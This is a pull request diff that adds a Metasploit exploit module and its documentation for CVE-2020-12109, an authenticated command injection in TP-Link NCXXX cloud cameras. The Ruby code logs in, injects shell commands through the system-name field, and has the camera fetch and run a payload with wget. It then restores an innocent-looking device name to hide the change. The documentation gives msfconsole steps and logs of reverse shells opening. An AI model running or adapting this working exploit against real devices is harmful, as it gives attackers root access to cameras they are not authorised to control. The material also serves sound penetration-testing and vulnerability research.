### PR TITLE
Add module for TP-Link Cameras Command Injection (CVE-2020-12109)

### DIFF
--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -48,16 +48,20 @@ This module will therefore support the following TP-Link cameras:
 You should get a shell.
 
 ## Options
-USERNAME => The web interface username
+**USERNAME**
+The web interface username
 
-PASSWORD => The web interface password for the specified username
+**PASSWORD**
+The web interface password for the specified username
 
-RHOSTS   => The target camera ip address
+**RHOSTS**
+The target camera ip address
 
-RPORT    => The target port (TCP)
+**RPORT**
+The target port (TCP)
 
-TIMEOUT  => Timeout for the HTTP Server to wait for the ELF payload request
-
+**TIMEOUT**
+Timeout for the HTTP Server to wait for the ELF payload request
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -2,14 +2,14 @@
 
 TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
 NC250, NC260, NC450) are vulnerable to an authenticated command 
-injection. In all devices except NC210, Despite a check on the name 
-length in swSystemSetProductAliasCheck, no other checks are in place 
+injection. In all devices except NC210, despite a check on the name 
+length in `swSystemSetProductAliasCheck`, no other checks are in place 
 in order to prevent shell metacharacters from being introduced. The 
-system name would then be used in swBonjourStartHTTP as part of a 
+system name would then be used in `swBonjourStartHTTP` as part of a 
 shell command where arbitrary commands could be injected and 
 executed as root. NC210 devices cannot be exploited directly via 
-/setsysname.cgi due to proper input validation. NC210 devices are 
-still vulnerable since swBonjourStartHTTP did not perform any 
+`/setsysname.cgi` due to proper input validation. NC210 devices are 
+still vulnerable since `swBonjourStartHTTP` did not perform any 
 validation when reading the alias name from the configuration file. 
 The configuration file can be written, and code execution can be 
 achieved by combining this issue with CVE-2020-12110.

--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -97,10 +97,6 @@ msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
 [*] Sending payload to 192.168.0.1 (Wget)
 [*] Sending stage (84 bytes) to 192.168.0.1
 [*] Command shell session 3 opened (192.168.0.254:6666 -> 192.168.0.1:60141) at 2020-09-16 18:58:02 -0400
-[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
-[*] Sending payload to 192.168.0.1 (Wget)
-[*] Sending stage (84 bytes) to 192.168.0.1
-[*] Command shell session 4 opened (192.168.0.254:6666 -> 192.168.0.1:60143) at 2020-09-16 18:58:04 -0400
 [*] Command Stager progress - 100.00% done (117/117 bytes)
 [*] Server stopped.
 
@@ -141,13 +137,9 @@ msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
 [*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
 [*] Sending stage (84 bytes) to 192.168.0.1
 [*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
-[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
-[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
-[*] Sending stage (84 bytes) to 192.168.0.1
 [*] Command Stager progress - 100.00% done (109/109 bytes)
 [*] Command shell session 4 opened (192.168.0.254:5555 -> 192.168.0.1:40220) at 2020-09-16 19:00:35 -0400
 [*] Server stopped.
-
 ```
 
 ### References

--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -60,9 +60,6 @@ The target camera ip address
 **RPORT**
 The target port (TCP)
 
-**TIMEOUT**
-Timeout for the HTTP Server to wait for the ELF payload request
-
 ## Scenarios
 
 Target = 0 (TP-Link NC200, NC220, NC230, NC250)
@@ -87,23 +84,26 @@ lhost => 192.168.0.254
 msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
 lport => 5555
 msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-[-] Handler failed to bind to 192.168.0.254:5555:-  -
-[*] Started reverse TCP handler on 0.0.0.0:5555 
-[*] Authenticating with admin:cGFzc3dvcmQ= ...
-msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > [+] Logged-in as admin
-[+] Got cookie: ss8mgz2ohggbmkt
-[+] Got token: tw74vc1jd946r0x
-[*] Starting web server on 192.168.0.254:8080 ...
-[*] Using URL: http://0.0.0.0:8080/
-[*] Local IP: http://192.168.0.254:8080/
-[*] Triggering payload download from http://192.168.0.254:8080
-[+] A request just came in...
-[*] Sending the payload...
-[*] Executing vsqjvhhj
+
+[*] Started reverse TCP handler on 192.168.0.254:6666 
+[*] Authenticating with admin:YWRtaW4= ...
+[+] Logged-in as admin
+[+] Got cookie: t46af69kmher6f9
+[+] Got token: g3cgt74qi0li8rd
+[*] Using URL: http://0.0.0.0:8080/UzN4UMl7PF9
+[*] Local IP: http://10.0.2.15:8080/UzN4UMl7PF9
+[*] Executing command: wget -qO /tmp/jxVywWSo http://192.168.0.254:8080/UzN4UMl7PF9;chmod +x /tmp/jxVywWSo;/tmp/jxVywWSo;rm -f /tmp/jxVywWSo
+[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
+[*] Sending payload to 192.168.0.1 (Wget)
 [*] Sending stage (84 bytes) to 192.168.0.1
-[*] Command shell session 1 opened (x.x.x.x:5555 -> x.x.x.x:38152) at xxxx-xx-xx xx:xx:xx -0400
+[*] Command shell session 3 opened (192.168.0.254:6666 -> 192.168.0.1:60141) at 2020-09-16 18:58:02 -0400
+[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command shell session 4 opened (192.168.0.254:6666 -> 192.168.0.1:60143) at 2020-09-16 18:58:04 -0400
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
 ```
 
 Target = 1 (TP-Link NC260, NC450)
@@ -128,24 +128,26 @@ lhost => 192.168.0.254
 msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
 lport => 5555
 msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > 
-[-] Handler failed to bind to 192.168.0.254:5555:-  -
-[*] Started reverse TCP handler on 0.0.0.0:5555 
+
+[*] Started reverse TCP handler on 192.168.0.254:5555 
 [*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ...
 [+] Logged-in as admin
-[+] Got cookie: iy6iaj6wugpxi3h
-[+] Got token: 6dv47bk91xn57y8
-[*] Starting web server on 192.168.0.254:8080 ...
-[*] Using URL: http://0.0.0.0:8080/
-[*] Local IP: http://192.168.0.254:8080/
-[*] Triggering payload download from http://192.168.0.254:8080
-[+] A request just came in...
-[*] Sending the payload...
-[*] Executing izosypiw
+[+] Got cookie: s8ee6m830juadua
+[+] Got token: kad9grok1ap37li
+[*] Using URL: http://0.0.0.0:8080/Le4r7p9x
+[*] Local IP: http://10.0.2.15:8080/Le4r7p9x
+[*] Executing command: wget -qO /tmp/MzczOZUl http://192.168.0.254:8080/Le4r7p9x;chmod +x /tmp/MzczOZUl;/tmp/MzczOZUl;rm -f /tmp/MzczOZUl
+[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
+[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
 [*] Sending stage (84 bytes) to 192.168.0.1
-[*] Command shell session 1 opened (x.x.x.x:5555 -> x.x.x.x:38128) at xxxx-xx-xx xx:xx:xx -0400
+[*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
+[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
+[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Command shell session 4 opened (192.168.0.254:5555 -> 192.168.0.1:40220) at 2020-09-16 19:00:35 -0400
+[*] Server stopped.
+
 ```
 
 ### References

--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -138,7 +138,6 @@ msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
 [*] Sending stage (84 bytes) to 192.168.0.1
 [*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
 [*] Command Stager progress - 100.00% done (109/109 bytes)
-[*] Command shell session 4 opened (192.168.0.254:5555 -> 192.168.0.1:40220) at 2020-09-16 19:00:35 -0400
 [*] Server stopped.
 ```
 

--- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
+++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md
@@ -1,0 +1,153 @@
+## Vulnerable Application
+
+TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
+NC250, NC260, NC450) are vulnerable to an authenticated command 
+injection. In all devices except NC210, Despite a check on the name 
+length in swSystemSetProductAliasCheck, no other checks are in place 
+in order to prevent shell metacharacters from being introduced. The 
+system name would then be used in swBonjourStartHTTP as part of a 
+shell command where arbitrary commands could be injected and 
+executed as root. NC210 devices cannot be exploited directly via 
+/setsysname.cgi due to proper input validation. NC210 devices are 
+still vulnerable since swBonjourStartHTTP did not perform any 
+validation when reading the alias name from the configuration file. 
+The configuration file can be written, and code execution can be 
+achieved by combining this issue with CVE-2020-12110.
+This module will therefore support the following TP-Link cameras:
+
+-NC200 <= 2.1.9 build 200225
+
+-NC220 <= 1.3.0 build 200304 
+
+-NC230 <= 1.3.0 build 200304
+
+-NC250 <= 1.3.0 build 200304 
+
+-NC260 <= 1.5.2 build 200304
+
+-NC450 <= 1.5.3 build 200304
+
+## Verification Steps
+-Turn your camera on and make sure you can connect to its web interface.
+
+-Take note of the camera model, ip address, web interface port and credentials.
+
+-Once that is done, open msfconsole and execute the following commands:
+   
+1. `use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection`
+2. `set rhost [camera ip]`
+3. `set rport [camera web interface port, e.g. 80 or 443]`
+4. `set target [ 0 for NC200, NC220, NC230, NC250 | 1 for NC260, NC450]`
+5. `set username [web interface username]`
+6. `set password [corresponding password]`
+7. `set payload [payload of choice, e.g. linux/mipsle/shell/reverse_tcp]` 
+8. `set lhost [host ip where our reverse shell is listening]`
+9. `set lport [port to listen for incoming shell]`
+10. `exploit`
+
+You should get a shell.
+
+## Options
+USERNAME => The web interface username
+
+PASSWORD => The web interface password for the specified username
+
+RHOSTS   => The target camera ip address
+
+RPORT    => The target port (TCP)
+
+TIMEOUT  => Timeout for the HTTP Server to wait for the ELF payload request
+
+
+## Scenarios
+
+Target = 0 (TP-Link NC200, NC220, NC230, NC250)
+
+```
+msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
+[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
+rhost => 192.168.0.1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80
+rport => 80
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
+username => admin
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
+password => password
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
+payload => linux/mipsle/shell/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
+lhost => 192.168.0.254
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
+lport => 5555
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[-] Handler failed to bind to 192.168.0.254:5555:-  -
+[*] Started reverse TCP handler on 0.0.0.0:5555 
+[*] Authenticating with admin:cGFzc3dvcmQ= ...
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > [+] Logged-in as admin
+[+] Got cookie: ss8mgz2ohggbmkt
+[+] Got token: tw74vc1jd946r0x
+[*] Starting web server on 192.168.0.254:8080 ...
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.0.254:8080/
+[*] Triggering payload download from http://192.168.0.254:8080
+[+] A request just came in...
+[*] Sending the payload...
+[*] Executing vsqjvhhj
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command shell session 1 opened (x.x.x.x:5555 -> x.x.x.x:38152) at xxxx-xx-xx xx:xx:xx -0400
+```
+
+Target = 1 (TP-Link NC260, NC450)
+
+```
+msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
+[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
+rhost => 192.168.0.1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443
+rport => 443
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1
+target => 1
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
+username => admin
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
+password => password
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
+payload => linux/mipsle/shell/reverse_tcp
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
+lhost => 192.168.0.254
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
+lport => 5555
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > 
+[-] Handler failed to bind to 192.168.0.254:5555:-  -
+[*] Started reverse TCP handler on 0.0.0.0:5555 
+[*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ...
+[+] Logged-in as admin
+[+] Got cookie: iy6iaj6wugpxi3h
+[+] Got token: 6dv47bk91xn57y8
+[*] Starting web server on 192.168.0.254:8080 ...
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.0.254:8080/
+[*] Triggering payload download from http://192.168.0.254:8080
+[+] A request just came in...
+[*] Sending the payload...
+[*] Executing izosypiw
+[*] Sending stage (84 bytes) to 192.168.0.1
+[*] Command shell session 1 opened (x.x.x.x:5555 -> x.x.x.x:38128) at xxxx-xx-xx xx:xx:xx -0400
+```
+
+### References
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109
+
+https://nvd.nist.gov/vuln/detail/CVE-2020-12109
+
+https://seclists.org/fulldisclosure/2020/May/2

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -146,12 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if target.name == 'TP-Link NC260, NC450'
-      datastore['SSL'] = true
-    else
-      datastore['SSL'] = false
-    end
-
     login # Get cookie and csrf token
     enable_bonjour # Enable bonjour service
     execute_cmdstager # Upload and execute payload

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_MIPSLE,
               'Platform' => 'linux',
-              'CmdStagerFlavor' => [ 'wget' ]
+              'CmdStagerFlavor' => [ 'wget' ],
+              'DefaultOptions' => { 'SSL' => true }
             }
           ]
         ],

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -142,7 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     print_status("Executing command: #{cmd}")
     sys_name("$(#{cmd})")
-    enable_bonjour
   end
 
   def exploit
@@ -153,6 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     login # Get cookie and csrf token
+    enable_bonjour # Enable bonjour service
     execute_cmdstager # Upload and execute payload
     sys_name('NC200') # Set back an innocent-looking device name
   end

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -103,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def enableBonjour()
-    begin
       res = send_request_cgi({
         'uri'    => '/setbonjoursetting.fcgi',
         'method' => 'POST',
@@ -118,7 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
       return nil
-    end
   end
 
   def execute(cmd)
@@ -127,7 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setSysName(cmd)
-    begin
       res = send_request_cgi({
         'uri'    => '/setsysname.fcgi',
         'method' => 'POST',
@@ -142,7 +139,6 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
       return nil
-    end
   end
 
   def startWebServer

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -1,0 +1,232 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',
+      'Description' => %q{
+          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
+          NC250, NC260, NC450) are vulnerable to an authenticated command
+          injection. In all devices except NC210, Despite a check on the name length in 
+          swSystemSetProductAliasCheck, no other checks are in place in order 
+          to prevent shell metacharacters from being introduced. The system name
+          would then be used in swBonjourStartHTTP as part of a shell command 
+          where arbitrary commands could be injected and executed as root. NC210 devices
+          cannot be exploited directly via /setsysname.cgi due to proper input
+          validation. NC210 devices are still vulnerable since swBonjourStartHTTP
+          did not perform any validation when reading the alias name from the
+          configuration file. The configuration file can be written, and code
+          execution can be achieved by combining this issue with CVE-2020-12110.
+      },
+      'Author'      =>
+        [
+          'Pietro Oliva <pietroliva[at]gmail.com>'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ]
+        ],
+      'DisclosureDate' => '29th April 2020',
+      'Platform'       => %w{ linux },
+      'Arch' => ARCH_MIPSLE,
+      'Targets'        =>
+        [
+          [ 'TP-Link NC200, NC220, NC230, NC250',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'TP-Link NC260, NC450',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the HTTP Server to wait for the ELF payload request', 60])
+      ])
+  end
+
+  def login
+    user = datastore['USERNAME']
+    pass = Base64.strict_encode64(datastore['PASSWORD'])
+    if target.name == 'TP-Link NC260, NC450'
+      pass=Rex::Text.md5(pass)
+    end
+    
+    print_status("Authenticating with #{user}:#{pass} ...")
+    begin
+      res= send_request_cgi({
+        'uri' => '/login.fcgi',
+        'method' => 'POST',
+        'vars_post' => {
+          "Username" => user,
+          "Password" => pass,
+        }
+      })
+      if res.nil? or res.code == 404
+        fail_with(Failure::NoAccess, "/login.fcgi did not reply correctly. Wrong target ip?")
+      end
+      if res.body =~ /\"errorCode\"\:0/ and res.headers.key?('Set-Cookie') and res.body =~ /token/
+        print_good("Logged-in as #{user}")
+        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
+        print_good("Got cookie: #{@cookie}")
+        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]
+        print_good("Got token: #{@token}")
+      else
+        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+  end
+
+  def enableBonjour()
+    begin
+      res = send_request_cgi({
+        'uri'    => '/setbonjoursetting.fcgi',
+        'method' => 'POST',
+        'encode_params' => false,
+        'cookie' => "sess=#{@cookie}",
+        'vars_post' => {
+          "bonjourState" => "1",
+          "token" => "#{@token}"
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+      return nil
+    end
+  end
+
+  def execute(cmd)
+    setSysName("$(#{cmd})")
+    enableBonjour()
+  end
+
+  def setSysName(cmd)
+    begin
+      res = send_request_cgi({
+        'uri'    => '/setsysname.fcgi',
+        'method' => 'POST',
+        'encode_params' => false,
+        'cookie' => "sess=#{@cookie}",
+        'vars_post' => {
+          "sysname" => "#{cmd}",
+          "token" => "#{@token}"
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+      return nil
+    end
+  end
+
+  def startWebServer
+    oldSSL = datastore['SSL']
+    datastore['SSL'] = false
+    lhost=datastore['LHOST']
+    srv_port = datastore['SRVPORT']
+
+    print_status("Starting web server on #{lhost}:#{srv_port} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => '/'
+    }})
+
+    datastore['SSL'] = oldSSL
+  end
+
+  def uploadAndExecute
+    srv_port = datastore['SRVPORT']
+    lhost=datastore['LHOST']
+
+    print_status("Triggering payload download from http://#{lhost}:#{srv_port}")
+    filename = rand_text_alpha_lower(8)
+
+    cmd = "wget http://#{lhost}:#{srv_port}/ -O /tmp/#{filename}"
+
+    res = execute(cmd)
+    if (!res)
+      fail_with(Failure::Unknown, "Payload upload failed")
+    end
+
+    wait_payload_delivery
+
+    cmd = "f=/tmp/#{filename}; chmod %2bx $f; $f %26 rm $f"
+    print_status("Executing #{filename}")
+    res = execute(cmd)
+    if (!res)
+      fail_with(Failure::Unknown, "Unable to execute payload")
+    end
+
+  end
+
+  def exploit
+    @payload = generate_payload_exe
+    @elf_delivered = false
+
+    if target.name == 'TP-Link NC260, NC450'
+      datastore['SSL'] = true
+    else
+      datastore['SSL'] = false
+    end
+
+    login()             # Get cookie and csrf token
+    startWebServer()    # Start payload delivery web server
+    uploadAndExecute()  # Trigger payload download and execution via command injection
+    setSysName("NC200") # Set back an innocent-looking device name
+
+  end
+
+  # Handle payload delivery
+  def on_request_uri(cli, request)
+    if (not @payload)
+      return # payload is not ready yet
+    end
+
+    if (not @elf_delivered)
+      print_good("A request just came in...")
+      print_status("Sending the payload...")
+    end
+
+    send_response(cli, @payload)
+    @elf_delivered = true
+  end
+
+  def wait_payload_delivery
+    while ( (datastore['TIMEOUT'] -= 1) > 0 )
+      if (@elf_delivered)
+        return
+      end
+      sleep(1)
+    end
+    
+    fail_with(Failure::Unknown, "No requests received within timeout. Connectivity issues?")
+  end
+end

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     wait_payload_delivery
 
-    cmd = "f=/tmp/#{filename}; chmod %2bx $f; $f %26 rm $f"
+    cmd = "f=/tmp/#{filename}; chmod %2bx $f; $f; rm $f"
     print_status("Executing #{filename}")
     res = execute(cmd)
     if !res

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_MIPSLE,
             'Platform' => 'linux'
             }
-          ],
+          ]
         ],
       'DefaultTarget'  => 0,
       ))

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -7,9 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -19,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,
           NC250, NC260, NC450) are vulnerable to an authenticated command
-          injection. In all devices except NC210, Despite a check on the name length in
+          injection. In all devices except NC210, despite a check on the name length in
           swSystemSetProductAliasCheck, no other checks are in place in order
           to prevent shell metacharacters from being introduced. The system name
           would then be used in swBonjourStartHTTP as part of a shell command
@@ -48,14 +46,16 @@ class MetasploitModule < Msf::Exploit::Remote
             'TP-Link NC200, NC220, NC230, NC250',
             {
               'Arch' => ARCH_MIPSLE,
-              'Platform' => 'linux'
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget' ]
             }
           ],
           [
             'TP-Link NC260, NC450',
             {
               'Arch' => ARCH_MIPSLE,
-              'Platform' => 'linux'
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget' ]
             }
           ]
         ],
@@ -67,7 +67,6 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
-        OptInt.new('TIMEOUT', [true, 'Timeout for the HTTP Server to wait for the ELF payload request', 60])
       ]
     )
   end
@@ -123,16 +122,11 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  def execute(cmd)
-    sys_name("$(#{cmd})")
-    enable_bonjour
-  end
-
   def sys_name(cmd)
     res = send_request_cgi({
       'uri' => '/setsysname.fcgi',
       'method' => 'POST',
-      'encode_params' => false,
+      'encode_params' => true,
       'cookie' => "sess=#{@cookie}",
       'vars_post' => {
         'sysname' => cmd,
@@ -145,50 +139,13 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  def start_web_server
-    old_ssl = datastore['SSL']
-    datastore['SSL'] = false
-    lhost = datastore['LHOST']
-    srv_port = datastore['SRVPORT']
-
-    print_status("Starting web server on #{lhost}:#{srv_port} ...")
-    start_service({ 'Uri' => {
-      'Proc' => proc { |cli, req| on_request_uri(cli, req) },
-      'Path' => '/'
-    } })
-
-    datastore['SSL'] = old_ssl
-  end
-
-  def upload_and_execute
-    srv_port = datastore['SRVPORT']
-    lhost = datastore['LHOST']
-
-    print_status("Triggering payload download from http://#{lhost}:#{srv_port}")
-    filename = rand_text_alpha_lower(8)
-
-    cmd = "wget http://#{lhost}:#{srv_port}/ -O /tmp/#{filename}"
-
-    res = execute(cmd)
-    if !res
-      fail_with(Failure::Unknown, 'Payload upload failed')
-    end
-
-    wait_payload_delivery
-
-    cmd = "f=/tmp/#{filename}; chmod %2bx $f; $f; rm $f"
-    print_status("Executing #{filename}")
-    res = execute(cmd)
-    if !res
-      fail_with(Failure::Unknown, 'Unable to execute payload')
-    end
-
+  def execute_command(cmd, _opts = {})
+    print_status("Executing command: #{cmd}")
+    sys_name("$(#{cmd})")
+    enable_bonjour
   end
 
   def exploit
-    @payload = generate_payload_exe
-    @elf_delivered = false
-
     if target.name == 'TP-Link NC260, NC450'
       datastore['SSL'] = true
     else
@@ -196,36 +153,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     login # Get cookie and csrf token
-    start_web_server # Start payload delivery web server
-    upload_and_execute # Trigger payload download and execution via command injection
+    execute_cmdstager # Upload and execute payload
     sys_name('NC200') # Set back an innocent-looking device name
-
   end
 
-  # Handle payload delivery
-  def on_request_uri(cli, _request)
-    if !@payload
